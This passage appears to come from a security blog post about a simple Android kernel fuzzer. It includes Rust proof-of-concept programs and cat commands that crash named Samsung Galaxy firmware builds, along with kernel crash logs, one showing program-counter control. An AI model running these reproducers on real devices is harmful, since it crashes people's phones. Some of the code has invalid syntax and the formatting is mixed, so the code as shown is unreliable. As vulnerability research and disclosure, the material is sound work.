<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="k">let</span> <span class="k">fn</span> <span class="o">=</span> <span class="s">"/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout"</span><span class="p">;</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="nn">File</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="k">fn</span><span class="p">)</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Make fuzzing threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">4</span> <span class="p">{</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">thrasher</span><span class="p">()));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to exit</span>
<span class="k">for</span> <span class="n">thr</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>What a top tier PoC!</p>
<h4 id="next-bug">Next bug?</h4>
<p>So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.</p>
<p>Nope, nothing else, the S5 is officially secure and fixed of all bugs.</p>
<h1 id="the-end-of-an-era">The end of an era</h1>
<p>Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if SELinux is set to permissive. But as time has gone on, these bugs have become hidden behind SELinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.</p>
<p>There is a lot that could improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make it better:</p>
<ul>
<li>Make it perform random <code class="language-plaintext highlighter-rouge">ioctl()</code> calls</li>
<li>Make it attempt to <code class="language-plaintext highlighter-rouge">mmap()</code> and use the mappings for these devices</li>
<li>Actually understand what the file expects</li>
<li>Use multiple processes or something to let the fuzzer continue to run when it gets stuck</li>
<li>Run it for more than 1 minute before giving up on a phone</li>
<li>Make better blacklists/whitelists</li>
</ul>
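<p>The multi-process idea, for example, could be as simple as running each batch of files in a child process under a watchdog, so a read that hangs forever in the kernel only stalls the child. A sketch (the commands in the test harness are stand-ins, not the fuzzer binary):</p>

```rust
use std::process::Child;
use std::time::{Duration, Instant};

// Wait on a spawned child, killing it if it outlives `timeout`.
// Returns true if the child had to be killed (i.e. it wedged).
fn reap_with_timeout(mut child: Child, timeout: Duration) -> bool {
    let start = Instant::now();
    loop {
        match child.try_wait().expect("Failed to poll child") {
            // Child exited on its own
            Some(_status) => return false,
            // Still running past the deadline: kill and reap it
            None if start.elapsed() >= timeout => {
                let _ = child.kill();
                let _ = child.wait();
                return true;
            }
            // Still running, poll again shortly
            None => std::thread::sleep(Duration::from_millis(50)),
        }
    }
}
```

<p>The parent would then log which files the dead child was assigned and move on, instead of sitting wedged alongside it.</p>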
<p>In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.</p>
<h1 id="wall-of-shame">Wall of Shame</h1>
<p><em>Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.</em></p>
<h4 id="g900f-exynos-galaxy-s5-g900fxxu1crh1-august-1-2017">G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)</h4>
<p><strong>PoC</strong></p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">File</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Read</span><span class="p">;</span>
<span class="k">fn</span> <span class="nf">thrasher</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Buffer to read into</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="k">let</span> <span class="k">fn</span> <span class="o">=</span> <span class="s">"/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout"</span><span class="p">;</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="nn">File</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="k">fn</span><span class="p">)</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Make fuzzing threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">4</span> <span class="p">{</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">thrasher</span><span class="p">()));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to exit</span>
<span class="k">for</span> <span class="n">thr</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="j200h-galaxy-j2-j200hxxu0aqk2-august-1-2017">J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)</h4>
<p><em>not root caused, just run the fuzzer</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>] lr : [<62655722>] psr: 000d0093
sp : ee457d20 ip : 00000000 fp : ee457d54
[c0] r10: ed859210 r9 : c0c833e4 r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>] lr : [<62655722>] psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
</code></pre></div></div>
<h4 id="j500h-galaxy-j5-j500hxxu2bqi1-august-1-2017">J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)</h4>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial0/readstatus</code></p>
<p>or</p>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial1/readstatus</code></p>
<p>or</p>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial2/readstatus</code></p>
<p>or</p>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial3/readstatus</code></p>
<h4 id="j500h-galaxy-j5-j500hxxu2bqi1-august-1-2017-1">J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)</h4>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/mdp/xlog/dump</code></p>
<h4 id="j500h-galaxy-j5-j500hxxu2bqi1-august-1-2017-2">J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)</h4>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/rpm_master_stats</code></p>
<h4 id="j700h-galaxy-j7-j700hxxu3brc2-august-1-2017">J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)</h4>
<p><em>not root caused, just run the fuzzer</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G W 3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70
</code></pre></div></div>
<h4 id="g920f-exynos-galaxy-s6-g920fxxu5dqbc-febuary-1-2017-now-gated-by-selinux-">G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (Febuary 1, 2017) Now gated by selinux :(</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G W 3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84
</code></pre></div></div>
<h4 id="g950f-exynos-galaxy-s8-g950fxxu4cri5-september-1-2018">G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)</h4>
<p>Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.</p>
<p>(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600
PC: 0xffffffc000c20230:
0230 128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250 01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270 deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290 deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0 deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0 deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0 deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310 deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040
</code></pre></div></div>
<p><strong>PoC</strong></p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="n">crate</span> <span class="n">rand</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">File</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Read</span><span class="p">;</span>
<span class="k">fn</span> <span class="nf">thrasher</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// These are the 2 files we want to fuzz</span>
<span class="k">let</span> <span class="n">random_paths</span> <span class="o">=</span> <span class="p">[</span>
<span class="s">"/sys/devices/platform/battery/power_supply/battery/mst_switch_test"</span><span class="p">,</span>
<span class="s">"/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"</span>
<span class="p">];</span>
<span class="c">// Buffer to read into</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="c">// Pick a random file</span>
<span class="k">let</span> <span class="n">file</span> <span class="o">=</span> <span class="o">&</span><span class="n">random_paths</span><span class="p">[</span><span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">random_paths</span><span class="nf">.len</span><span class="p">()];</span>
<span class="c">// Read a random number of bytes from the file</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="nn">File</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">rsz</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="p">(</span><span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">rsz</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Make fuzzing threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">4</span> <span class="p">{</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">thrasher</span><span class="p">()));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to exit</span>
<span class="k">for</span> <span class="n">thr</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>So slimy it belongs in the slime tree